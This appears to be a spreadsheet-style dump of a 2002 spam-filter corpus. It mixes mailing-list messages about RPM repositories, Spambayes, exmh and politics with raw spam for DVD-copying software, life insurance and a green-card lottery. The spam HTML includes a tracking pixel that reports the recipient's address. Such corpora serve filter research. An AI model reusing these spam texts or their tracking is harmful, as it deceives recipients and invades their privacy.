 pan=3D=222=22 height=3D=2231=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspaci=
 ng=3D=220=22 cellpadding=3D=224=22&gt;&lt;tr&gt;&lt;td width=3D=2287%=22 height=3D=2221=22&gt;&lt;div =
 align=3D=22right=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;td width=3D=227%=22 he=
 ight=3D=2221=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 size=3D=226=22 color=3D=22=23FFF=
 FFF=22&gt;
 OTC&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;td width=3D=226%=22 height=3D=2221=22&gt;&lt;div align=3D=22le=
 ft=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/=
 TR&gt;&lt;/TABLE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ******
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Sep 05, 2002 at 12:32:58PM +0200, Axel Thimm wrote:
 &gt; On Thu, Sep 05, 2002 at 07:11:23AM +0000,  Angles  Puglisi wrote:
 &gt; &gt; If I can use apt, can I use it to get updates from these 3 different
 &gt; &gt; places:
 &gt; &gt; 1. the (null) up2date Redhat upgrades
 &gt; &gt; 2. the (null) files at Freshrpms.net
 &gt; &gt; 3. the regular RH7.3 files from freshrpms.net
 &gt; You could build your own apt-repository. Just mirror the needed
 &gt; directories (e.g. by using a wget cron job), symlink the needed rpms
 &gt; and recreate the repository. It is already worth the trouble, if you
 &gt; have more than one installation.
 Always nice to have one to put stuff that overrides RH things. Like if
 you absolutely detest qt and some programs are rebuildable from sources
 with different %configure options. You can get src.rpm, edit spec, bump
 release numberwith your initials and another number and rebuild, insert
 into apt and let loose... :)
 Doesn't freshrpms have updates dir too? Maybe not quite as up to date as
 up2date but still. I would never use up2date. There is another
 repository at apt-rpm.tuxfamily.org IIRC. Not sure if that had The
 updates.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] all but one testing
</t>
  </si>
  <si>
    <t xml:space="preserve">Tim Peters wrote:
 &gt; I've run no experiments on training set size yet, and won't hazard a guess
 &gt; as to how much is enough.  I'm nearly certain that the 4000h+2750s I've been
 &gt; using is way more than enough, though.
 Okay, I believe you.
 &gt; Each call to learn() and to unlearn() computes a new probability for every
 &gt; word in the database.  There's an official way to avoid that in the first
 &gt; two loops, e.g.
 &gt; 
 &gt;     for msg in spam:
 &gt;         gb.learn(msg, True, False)
 &gt;     gb.update_probabilities()
 I did that.  It's still really slow when you have thousands of messages.
 &gt; In each of the last two loops, the total # of ham and total # of spam in the
 &gt; "learned" set is invariant across loop trips, and you *could* break into the
 &gt; abstraction to exploit that:  the only probabilities that actually change
 &gt; across those loop trips are those associated with the words in msg.  Then
 &gt; the runtime for each trip would be proportional to the # of words in the msg
 &gt; rather than the number of words in the database.
 I hadn't tried that.  I figured it was better to find out if "all but
 one" testing had any appreciable value.  It looks like it doesn't so
 I'll forget about it.
 &gt; Another area for potentially fruitful study:  it's clear that the
 &gt; highest-value indicators usually appear "early" in msgs, and for spam
 &gt; there's an actual reason for that:  advertising has to strive to get your
 &gt; attention early.  So, for example, if we only bothered to tokenize the first
 &gt; 90% of a msg, would results get worse?
 Spammers could exploit this including a large MIME part at the beginning
 of the message.  In pratice that would probably work fine.  
 &gt; sometimes an on-topic message starts well but then rambles.
 Never.  I remember the time when I was ten years old and went down to
 the fishing hole with my buddies.  This guy named Gordon had a really
 huge head.  Wait, maybe that was Joe.  Well, no matter.  As I recall, it
 was a hot day and everyone was tired...Human Growth Hormone...girl with
 huge breasts...blah blah blah......
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Linking message [was: Re: Patch to complete a change...]
</t>
  </si>
  <si>
    <t xml:space="preserve">Both Move and Link are one-click actions.
 &lt;Button-3&gt; on a folder label Move's the current message
 &lt;Shift-Button-3&gt; on a folder label Link's the current message
 &gt;&gt;&gt;Robert Elz said:
  &gt;     Date:        Thu, 12 Sep 2002 23:26:33 -0500
  &gt;     From:        Hal DeVore &lt;haldevore@acm.org&gt;
  &gt;     Message-ID:  &lt;23204.1031891193@dimebox&gt;
  &gt; 
  &gt;   | 1) Right click on the folder label in the folder list
  &gt; 
  &gt; That (the way I have it configured, and it sounds as if the way Tony does
  &gt; too) just does a move (rather than select as target without moving).
  &gt; 
  &gt; Of course, if you can manage to get no messages currently selected, then
  &gt; it works fine.
  &gt; 
  &gt;   | 2) In the main window, the "+" key puts you into a "change 
  &gt;   |    folder" mode (the first time you use it after starting exmh),
  &gt;   |    hit a second + and you go to "set a target" mode.  Type a few
  &gt;   |    characters of the folder name and hit space for autocomplete.
  &gt; 
  &gt; This works, but is not nice if you're not using the keyboard, but just
  &gt; the mouse.
  &gt; 
  &gt; Tony: I agree - a nice way to link in one click would be good, and should
  &gt; be easy to add, though currently adding mouse bindings (something like
  &gt; shift right click would be a good choice) is much harder than adding
  &gt; key bindings.
  &gt; 
  &gt; But note there's no need to "undo" - the way I generally use link, if
  &gt; the desired destination folder isn't the current selected target, is
  &gt; to right click on the target, which selects it and moves the message,
  &gt; (and because I have the "automatic move to the next message on move or
  &gt; link option set) select the message again, and then "Link".
  &gt; 
  &gt; Exmh only permits one uncomitted action to be selected for a message at a
  &gt; time, that is, one of delete, move, or link.   Selecting any of those
  &gt; implicitly undoes any previous choice from the three (so you cannot
  &gt; achieve a "move" by doing a link, then delete, then commit, it needs to
  &gt; be link, commit, delete, commit).  (xmh was just the same there incidentally
      ).
  &gt; 
  &gt;   | How's spring shaping up "down under"?
  &gt; 
  &gt; No meaningful comment from me, I'm not there at the minute.   But I'm told
  &gt; that where I'm from it is cold, wet, and miserable, though has been better
  &gt; during the day (sunny days, cold nights) for the past few.    In any case,
  &gt; all of that is a good enough reason to stay away...
  &gt; 
  &gt; kre
  &gt; 
  &gt; 
  &gt; 
  &gt; _______________________________________________
  &gt; Exmh-users mailing list
  &gt; Exmh-users@redhat.com
  &gt; https://listman.redhat.com/mailman/listinfo/exmh-users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</si>
  <si>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Re: [SAdev] [Bug 735] spamassassin -t lies
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 26 Aug 2002 the voices made bugzilla-daemon@hughes-family.org write:
 &gt; http://www.hughes-family.org/bugzilla/show_bug.cgi?id=735
 &gt; ------- Additional Comments From br+spamassassin@panix.com  2002-08-26 09:33 -------
 &gt; Just because it's documented doesn't mean it's a good thing.
 &gt;
 &gt; I work for an ISP.  We provide SpamAssassin to our customers.  I got email
 &gt; today from a support tech saying that "spamassassin -t" reports that a
 &gt; message is probably spam even when it's not, and why is this, and can we
 &gt; change it?  I thought about why it is, and the only answer I could come up
 &gt; with was, "it was easier for the programmer that way".  That's an answer, I
 &gt; guess, but her point was that this is going to generate support calls, and
 &gt; support calls cost us time and money.
  Why would a customer use `spamassassin -t` without understanding what it does?
 	/Tony
 -- 
 # Per scientiam ad libertatem! // Through knowledge towards freedom! #
 # Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #
      perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'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</si>
  <si>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Righ, somebody. Reminds me of the old Divorced Man's exposition of what
 happened to him.
 "First, you get a ring. Then you give it away. Then, you get a house. And
 you give *that* away...."
 Just kidding, Darling...
 ;-).
 Cheers,
 RAH
 Who, um, doesn't own a house...
 --- begin forwarded text
 Date: Tue, 24 Sep 2002 20:12:12 -0400
 From: Somebody
 To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 Subject: Re: SF Weekly's Ultimate SF Date lineup :-)
 Bob,
     Living aboard a Cessna 172 would be challenging, but I did meet a
 couple at an airshow in Point Mugu in 1995 or so that had converted an
 old seaplane (it was a bit larger than a PBY, I think) to something of a
 floating, flying RV.  They visited a lot of airshows and covered a lot of
 miles.  I'm sure maintenance (on a 50+ year old airframe), fuel (for two
 large radial engines) insurance and other costs were out of my price
 range, but what a hoot!
     On a more realistic note, the flight to Half Moon bay was probably 2
 hours of flight time at about  $75/hour in the Cessna.  Not exactly a
 cheap date, but that's nothing compared to the money I've spent on her
 since.  (And loved every minute of it, Darling!!)
         &lt;Somebody&gt;
 "R. A. Hettinga" wrote:
 &gt; --- begin forwarded text
 &gt;
 &gt; Status: RO
 &gt; Delivered-To: fork@spamassassin.taint.org
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: Re: SF Weekly's Ultimate SF Date lineup :-)
 &gt; From: Dave Long &lt;dl@silcom.com&gt;
 &gt; Sender: fork-admin@xent.com
 &gt; Date: Tue, 24 Sep 2002 13:28:04 -0700
 &gt;
 &gt; &gt; Proving, once again, that aviators get all the chicks...
 &gt;
 &gt; Just as long as they have the wherewithal
 &gt; for avgas, anyway.
 &gt;
 &gt; I think Turpin once calculated that one
 &gt; could do a decent amount of messing about
 &gt; for about $30K of boat and $12K/year in
 &gt; living expenses.
 &gt;
 &gt; What are the equivalent figures for live
 &gt; aboard aircraft?
 &gt;
 &gt; -Dave
 &gt;
 &gt; (How difficult would it be to find the
 &gt; harbormaster, after mooring to the top
 &gt; of the Empire State Building?)
 &gt;
 &gt; --- end forwarded text
 &gt;
 &gt; --
 &gt; -----------------
 &gt; R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 &gt; The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 &gt; 44 Farquhar Street, Boston, MA 02131 USA
 &gt; "... however it may deserve respect for its usefulness and antiquity,
 &gt; [predicting the end of the world] has not been found agreeable to
 &gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'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</si>
  <si>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Re: Internet radio - example from a college station
</t>
  </si>
  <si>
    <t xml:space="preserve">Chris Haun wrote:
 &gt; 
 &gt; We would need someone to sit in the studio 24/7 writing down all this info -
 &gt; which sometimes isn't available, like from earlier album that don't have
 &gt; serial numbers and barcodes. Then still if only the magic 18 people
 &gt; webstream our signal, the price would become quite exponential since we play
 &gt; on average 16 songs an hour, we'd be paying $22.11 everyday to stream to
 &gt; those 18 people. So really, it does have to do with the internet tax, but it
 &gt; is a few reasons together why we can't do it after their kill-date. :(
 Who is John Galt?
 (RoUS in the throes of reading Atlas Shrugged again)
 -- 
 #ken	P-)}
 Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
 Author, developer, opinionist      http://Apache-Server.Com/
 "Millennium hand and shrimp!"
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Something wrong with Database?
</t>
  </si>
  <si>
    <t xml:space="preserve">Until a few days ago, razor (sdk 2.03, client 2.12) was catching a
 decent set of spams.  It seems now, however, that it isn't catching
 anything.  I got one email this morning with "ADV:" in the subject
 another two or three about how many inches longer I can be.  Did I
 miss something recently perhaps regarding configuration changes, etc?
 Thanks in advance,
 Joe
 ---
 Joe Berry
 joe@topshot.com
 AIM "joe topshot"
 Yahoo Msgr "joetopshot"
 Baltimore, MD
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">from slate's "today's papers":  
 The New York Times and Los Angeles Times both lead with word that
 a federal judge ruled yesterday that the nation's largest
 national gas pipeline company, El Paso, illegally withheld gas
 from the market during California's energy squeeze in 2000-01.
 The judge concluded that El Paso left 21 percent of its capacity
 in the state off-line, thus driving up the price of gas and
 helping to induce rolling blackouts. 
 and this is the product of overregulation?
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
 Hall
 Sent: Monday, September 23, 2002 11:57 PM
 To: FoRK
 Subject: liberal defnitions
 Depends on how much over spending vs. how much (and what type) over
 regulation.
 The biggest problem with over regulation is the costs can be invisible.
 It also has the ability to single out particular people, while over
 spending spreads the damage more evenly.  Rent control would be an
 example of a regulation solution that is in general worse than spending
 tons of money on public housing.
 As for the definition of a liberal being someone who seeks to impose
 both, I find no fault in that definition whatsoever.  The opinion that
 EITHER we are spending too much OR we have too much regulation is pretty
 much anathema to liberal politics.
 Finally, those who argue that there are private replacements for much
 government regulation are not saying that a state of nature (no private
 replacements, no government regulation) is better than government
 regulation itself.
 And in my experience people who label themselves 'Green' (which does not
 include everyone who loves trees and thinks smokestacks are ugly) is a
 watermelon.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Geege
 &gt; Schuman
 &gt; 
 &gt; funny. i read it as green = red, as in accounting, as in fiscally
 &gt; irresponsible.  which do you think is the worse indictment -
 &gt; overregulation
 &gt; or overspending?  there are many (dickheads) who buy into the
 &gt; neo-conservative media's (fox's) definiton of "liberal" as "one who
 seeks
 &gt; to
 &gt; impose both."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] Re: Important - reenactor insurance needed
</t>
  </si>
  <si>
    <t xml:space="preserve">My gut reaction would be to tell them to go and shite, but this might not help to solve the problem. People who do horsey gigs get insurance because they can prove that they are 'expert'. They can then get a quote. What about finding out what they are prepared to insure, and then tell them that you are pulling in your horns and will do what you are insured to do, and make sure no one chops up any one else.
 Best of luck
 Iain
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Friend,Instantly Copy ANY DVD or Playstation Game with this software......
</t>
  </si>
  <si>
    <t xml:space="preserve">--------------103237257898946
 Content-Type: text/plain; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 Friend,Now you can copy DVD's and Games
 http://www.terra.es/personal9/bigmac241/
 BACKUP DVD VIDEO's WITH YOUR CD-R BURNER
 With 321 studio's software, you can now copy
 any DVD and Playstation Game.  Never buy another 
 backup DVD movie again.  Just copy it!
 This is the first time this software is being made
 available to the public. All the software you need 
 to burn your own DVD Video, is included in 321 Studio's 
 software package DVD Copy Plus!  The movies will play 
 in a standard DVD player. With detailed, easy to follow, 
 step-by-step instructions, you can BURN your own DVD 
 Video using nothing more than your DVD-ROM 
 and CD-R drives. Purchase a copy! Click below.
 http://www.terra.es/personal9/bigmac241/
 Order today and receive!
 *Step by Step Interactive Instructions
 *All Software Tools Included On CD
 *No DVD Burner Required
 *FREE Live Technical Support
 *30 Day Risk Free Trial Available
 With DVD Copy Plus you can backup Your DVD Movies with 
 the same 74min or 80min CD-R's you've used in the past 
 to create audio CD's. Our software compresses the large 
 DVD files on your standard DVD to VCD, SVCD, and DivX 
 much the same way the popular MP3 format compresses audio.  
 Order today and start burning
 http://www.terra.es/personal9/bigmac241/
 Thank You,
 CopymyDVD
 http://inglesa.net/unsub.php?client=atomicDOT
 We take your privacy very seriously and it is our policy never to send
 unwanted email messages. This message has been sent to zzzz@spamassassin.taint.org
 because you originally joined one of our member sites or you signed up
 with a party that has contracted with atomicDOT. Please
 http://tilw.net/unsub.php?client=atomicDOT&amp;msgid=18090200013
 to Unsubscribe (replying to this email WILL NOT unsubscribe you). 
 TRCK:atomicDOT;mp*qhwqrwhlqf!frp;8;
 --------------103237257898946
 Content-Type: text/html; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Backup your DVD's&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=iso-8859-1"&gt;
 &lt;META content="MSHTML 6.00.2600.0" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;body&gt;&lt;DIV&gt;&lt;/DIV&gt;
 &lt;BLOCKQUOTE 
 style="PADDING-RIGHT: 0px; PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px"&gt;
   &lt;DIV&gt;&lt;/DIV&gt;
   &lt;TABLE cellSpacing=0 cellPadding=0 width=525 align=center bgColor=#ffffff 
   border=0&gt;
     &lt;TBODY&gt; 
     &lt;TR&gt; 
       &lt;TD width="33"&gt;&lt;IMG height=1 src="images/spacer.gif" width=33 border=0&gt;&lt;/TD&gt;
       &lt;TD width="174"&gt;&lt;IMG height=1 src="images/spacer.gif" width=174 border=0&gt;&lt;/TD&gt;
       &lt;TD width="360"&gt;&lt;IMG height=1 src="images/spacer.gif" width=360 border=0&gt;&lt;/TD&gt;
       &lt;TD width="33"&gt;&lt;IMG height=1 src="images/spacer.gif" width=33 border=0&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD colSpan=4&gt;&lt;a href="http://www.terra.es/personal9/bigmac241/"&gt;&lt;IMG height=253 src="http://www.terra.es/personal9/bigmac241/images/mailer8_r1_c1.gif" 
         width=600 useMap=#Map border=0&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD background=http://www.terra.es/personal9/bigmac241/images/mailer8_r2_c1.gif height=181&gt;&amp;nbsp;&lt;/TD&gt;
       &lt;TD vAlign=top align=left colSpan=2 height=181&gt; 
         &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;With DVDCopyPlus 
           and PowerCDR5.0 you can copy and burn your&lt;/FONT&gt;&lt;/P&gt;
         &lt;UL&gt;
           &lt;LI&gt;                      &lt;img src="http://www.terra.es/personal9/bigmac241/images/INSTANTLY-DOWNLOAD.gif" alt="" height="36" width="288" border="0"&gt;
 							&lt;li&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;DVD Movies&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;
 							&lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Playstation &lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;MP3s, AVIs and all 
             other multimedia Files&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt; 
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Software, Music 
             CDs (perfect RAW data duplication)&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt; 
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;NEW! Burn to CD-R 
             or DVD-R&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;
         &lt;/UL&gt;
         &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Protect your 
           investments by backing up your CD, DVD, MP3, Data and Game collections 
           with burned copies that really work! Separately, DVDCopyPlus and PowerCDR5.0 
           are over $100 worth of software that you can purchase bundled right 
           now for just $49.99!&lt;/FONT&gt;&lt;/P&gt;
         &lt;P align=center&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
         size=2&gt;&lt;B&gt;&lt;FONT size=5&gt;THAT'S 50% OFF!&lt;BR&gt;
           &lt;/FONT&gt;&lt;A 
         href="http://www.terra.es/personal9/bigmac241/"&gt;MORE DETAILS&lt;/A&gt; &lt;A 
         href="http://www.terra.es/personal9/bigmac241/"&gt;ORDER NOW&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;/TD&gt;
       &lt;TD background=http://www.terra.es/personal9/bigmac241/images/mailer8_r2_c4.gif height=181&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD colSpan=4&gt;&lt;IMG height=24 src="http://www.terra.es/personal9/bigmac241/images/mailer8_r3_c1.gif" 
         width=600 border=0 name=mailer8_r3_c1&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD height="18"&gt;&lt;/TD&gt;
       &lt;TD&gt;&lt;/TD&gt;
       &lt;TD&gt;&lt;/TD&gt;
       &lt;TD&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;/TBODY&gt; 
   &lt;/TABLE&gt;
   &lt;MAP name=Map&gt;&lt;AREA shape=POLY 
     coords=244,119,270,129,280,114,297,125,318,113,327,129,355,120,352,133,385,131,381,140,398,145,398,152,405,151,397,160,383,165,409,172,381,180,404,193,384,195,382,207,384,212,364,210,351,213,353,224,327,216,317,230,297,219,278,232,269,218,243,225,238,210,211,210,209,202,199,193,216,180,186,172,216,164,192,151,195,143,211,136,211,132,231,135,243,130,243,121 
     href="http://www.terra.es/personal9/bigmac241/"&gt;&lt;/MAP&gt;&lt;FONT 
   face=Verdana,Geneva,Arial,Helvetica,sans-serif color=#000000 size=1&gt;
   &lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;/FONT&gt;&lt;/BLOCKQUOTE&gt;&lt;/BODY&gt;&lt;/body&gt;&lt;/HTML&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p&gt;&lt;font size="1" face="Arial"&gt;We take your privacy very seriously and it is our policy never to send unwanted email messages.  This message has been sent to zzzz@spamassassin.taint.org because you originally joined one of our member sites or you signed up with a party that has contracted with atomicDOT.  Please &lt;a href="http://tilw.net/unsub.php?client=atomicDOT&amp;msgid=18090200013" TARGET="_blank"&gt;Click Here&lt;/a&gt;&lt;/font&gt; to Unsubscribe  &lt;font size="1" face="Arial"&gt;(replying to this email WILL NOT unsubscribe you).  &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;&gt;
 &lt;/body&gt;&lt;/html&gt;&lt;br&gt;&lt;br&gt;
 &lt;img src="http://tilw.net/counter.php?client=atomicDOT&amp;email=zzzz@spamassassin.taint.org&amp;msgid=18090200013" width="1" height="1" border="0" alt=""&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size="-5"&gt;TRCK:atomicDOT;mp*qhwqrwhlqf!frp;8;&lt;/font&gt;
 --------------103237257898946--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Snub for minister in election row
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535469,215/
 Date: 2002-10-04T02:38:56+01:00
 *Politics:* Tony Blair has distanced himself from a minister accused of 
 meddling in an election for the leadership of the Labour party's biggest trade 
 union affiliate.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mplayer
</t>
  </si>
  <si>
    <t xml:space="preserve">Hey
 Since I upgraded to redhat8 mplayer -vo sdl isnt working for me
 It gives me black screen and I only hear sound.
 can anyone help me with this ?
 btw,
 also the source rpm specified that I can do --without libdv
 but it didn't work, worked for lirc and arts.
 Thanks,
 Roi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Energy gamers screwed California economy
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485786
 Date: Not supplied
 Stefan sez: 
     A federal judge has determined that gas pipline manager El Paso did indeed 
     limit natural gas supplies to California, resulting in ruinous prices, 
     rolling blackouts, and smug Cato Institute flaks wagging their fingers at 
     hot-tubbers and environmentalists. 
     California was sitting on a juicy dotcom-era tax windfall before it all got 
     sucked away by this phony crisis. 
     If I were Gov. Davis, I'd sieze every private pipeline, powerline, and 
     power plant and hold them hostage until the energy industry pays back every 
     dime they extorted from the state.  
 Link[1] Discuss[2] (_Thanks, Stefan[3]!_)
 [1] http://www.nytimes.com/aponline/business/AP-Natural-Gas-Prices.html
 [2] http://www.quicktopic.com/boing/H/XmSAjzMJqcXB
 [3] http://www.io.com/~stefanj
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Have you planned for your family's future?         ZBM
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
 "&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;CENTER&gt;&lt;A href=3D"http://61.145.116.189/user0203/627216/index.htm"&gt;
 &lt;IMG src=3D"http://61.129.68.14/life-ad.gif" border=3D0&gt;&lt;/A&gt; &lt;/CENTER&gt;&lt;BR&gt;=
 &lt;BR&gt;
 &lt;TABLE width=3D450 align=3Dcenter&gt;&lt;TBODY&gt;&lt;TR&gt;
 &lt;TD align=3Dmiddle&gt;&lt;FONT face=3DArial,Helvetica color=3D#000000 size=3D1&gt;=FF=
 FFFFA9
 Copyright 2002 - All rights reserved&lt;BR&gt;&lt;BR&gt;If you would no longer like us
 to contact you or feel that you have&lt;BR&gt;received this email in error,
 please &lt;A href=3D"http://61.145.116.189/light/first.asp"&gt;click here to
 unsubscribe&lt;/A&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: adv: Win a Green Card and Become a U.S Citizen!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;body bgcolor="#FFFFFF" marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"&gt;
 &lt;CENTER&gt;
 &lt;TABLE width="600" cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;TABLE cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=0&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/top_flag.gif" width="175" height="80" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;img src="http://www.divl.com/images/mail/top_blue.gif" width="425" height="80" border="0"&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;TABLE cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/application.asp?L=0&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/btn_apply0.gif" width="124" height="30" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/general.asp?L=0&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/btn_requirements0.gif" width="132" height="30" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/faq.asp?L=0&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/btn_faq0.gif" width="53" height="30" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;img src="http://www.divl.com/images/mail/top_red.gif" width="291" height="30" border="0"&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colspan="4"&gt;&lt;img src="http://www.divl.com/images/trans.gif" width="1" height="2" border="0"&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;TABLE width="600" cellspacing="0" cellpadding="1" border="0"&gt;
 &lt;TR&gt;
 &lt;TD bgcolor="#999999"&gt;
 &lt;TABLE bgcolor="#FFFFFF" width="100%" height="100%" cellspacing="0" border="0"&gt;
 &lt;TR&gt;
 &lt;TD valign="top"&gt;
 &lt;TABLE cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;img src="http://www.divl.com/images/mail/lang_spacer.gif" width="11" height="21"&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=0&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/mail/lang_en.gif" width="80" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=4&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/mail/lang_es.gif" width="85" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=1&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/mail/lang_de.gif" width="80" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=2&amp;CID=86"&gt;&lt;img src="http://www.divl.com/images/mail/lang_it.gif" width="80" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
